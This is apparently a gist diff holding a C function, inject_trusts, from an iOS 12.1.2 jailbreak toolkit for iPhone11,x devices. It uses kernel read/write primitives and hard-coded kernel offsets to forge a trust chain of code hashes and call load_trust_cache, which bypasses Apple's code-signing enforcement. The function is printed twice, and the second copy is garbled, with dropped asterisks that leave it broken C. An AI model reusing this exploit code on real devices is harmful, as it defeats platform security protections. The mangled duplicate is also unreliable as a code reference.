djeraseit · July 15, 2020 00:25
diff --git a/inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c b/inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
 void inject_trusts(int pathc, const char *paths[])
 {
    printf("[+] injecting into trust cache...\n");
    
    extern uint64_t g_kern_base;
    
    static uint64_t tc = 0;
    if (tc == 0) {
        /* loaded_trust_caches
         iPhone11,2-4-6: 0xFFFFFFF008F702C8
         iPhone11,8: 0xFFFFFFF008ED42C8
         */
        tc = g_kern_base + (0xFFFFFFF008F702C8 - 0xFFFFFFF007004000);
    }
    
    printf("[+] trust cache: 0x%llx\n", tc);
    
    struct trust_chain fake_chain;
    fake_chain.next = kernel_read64(tc);
 #if (0)
    *(uint64_t *)&fake_chain.uuid[0] = 0xabadbabeabadbabe;
    *(uint64_t *)&fake_chain.uuid[8] = 0xabadbabeabadbabe;
 #else
    arc4random_buf(&fake_chain.uuid, 16);
 #endif
    
    int cnt = 0;
    uint8_t hash[CC_SHA256_DIGEST_LENGTH];
    hash_t *allhash = malloc(sizeof(hash_t) * pathc);
    for (int i = 0; i != pathc; ++i) {
        uint8_t *cd = getCodeDirectory(paths[i]);
        if (cd != NULL) {
            getSHA256inplace(cd, hash);
            memmove(allhash[cnt], hash, sizeof(hash_t));
            ++cnt;
        }
    }
    
    fake_chain.count = cnt;
    
    size_t length = (sizeof(fake_chain) + cnt * sizeof(hash_t) + 0x3FFF) & ~0x3FFF;
    uint64_t kernel_trust = kalloc(length);
    printf("[+] kalloc: 0x%llx\n", kernel_trust);
    
    printf("[+] writing fake_chain\n");
    kernel_write(kernel_trust, &fake_chain, sizeof(fake_chain));
    printf("[+] writing allhash\n");
    kernel_write(kernel_trust + sizeof(fake_chain), allhash, cnt * sizeof(hash_t));
    printf("[+] writing trust cache\n");
    
 #if (0)
    kernel_write64(tc, kernel_trust);
 #else
    /* load_trust_cache
     iPhone11,2-4-6: 0xFFFFFFF007B80504
     iPhone11,8: 0xFFFFFFF007B50504
     */
    uint64_t f_load_trust_cache = g_kern_base + (0xFFFFFFF007B80504 - 0xFFFFFFF007004000);
    uint32_t ret = kernel_call_7(f_load_trust_cache, 3,
                                 kernel_trust,
                                 length,
                                 0);
    printf("[+] load_trust_cache: 0x%x\n", ret);
 #endif
    
    printf("[+] injected trust cache\n");
 }
	void inject_trusts(int pathc, const char *paths[])
	{
	printf("[+] injecting into trust cache...\n");

	extern uint64_t g_kern_base;

	static uint64_t tc = 0;
	if (tc == 0) {
	/* loaded_trust_caches
	iPhone11,2-4-6: 0xFFFFFFF008F702C8
	iPhone11,8: 0xFFFFFFF008ED42C8
	*/
	tc = g_kern_base + (0xFFFFFFF008F702C8 - 0xFFFFFFF007004000);
	}

	printf("[+] trust cache: 0x%llx\n", tc);

	struct trust_chain fake_chain;
	fake_chain.next = kernel_read64(tc);
	#if (0)
	(uint64_t )&fake_chain.uuid[0] = 0xabadbabeabadbabe;
	(uint64_t )&fake_chain.uuid[8] = 0xabadbabeabadbabe;
	#else
	arc4random_buf(&fake_chain.uuid, 16);
	#endif

	int cnt = 0;
	uint8_t hash[CC_SHA256_DIGEST_LENGTH];
	hash_t allhash = malloc(sizeof(hash_t) pathc);
	for (int i = 0; i != pathc; ++i) {
	uint8_t *cd = getCodeDirectory(paths[i]);
	if (cd != NULL) {
	getSHA256inplace(cd, hash);
	memmove(allhash[cnt], hash, sizeof(hash_t));
	++cnt;
	}
	}

	fake_chain.count = cnt;

	size_t length = (sizeof(fake_chain) + cnt * sizeof(hash_t) + 0x3FFF) & ~0x3FFF;
	uint64_t kernel_trust = kalloc(length);
	printf("[+] kalloc: 0x%llx\n", kernel_trust);

	printf("[+] writing fake_chain\n");
	kernel_write(kernel_trust, &fake_chain, sizeof(fake_chain));
	printf("[+] writing allhash\n");
	kernel_write(kernel_trust + sizeof(fake_chain), allhash, cnt * sizeof(hash_t));
	printf("[+] writing trust cache\n");

	#if (0)
	kernel_write64(tc, kernel_trust);
	#else
	/* load_trust_cache
	iPhone11,2-4-6: 0xFFFFFFF007B80504
	iPhone11,8: 0xFFFFFFF007B50504
	*/
	uint64_t f_load_trust_cache = g_kern_base + (0xFFFFFFF007B80504 - 0xFFFFFFF007004000);
	uint32_t ret = kernel_call_7(f_load_trust_cache, 3,
	kernel_trust,
	length,
	0);
	printf("[+] load_trust_cache: 0x%x\n", ret);
	#endif

	printf("[+] injected trust cache\n");
	}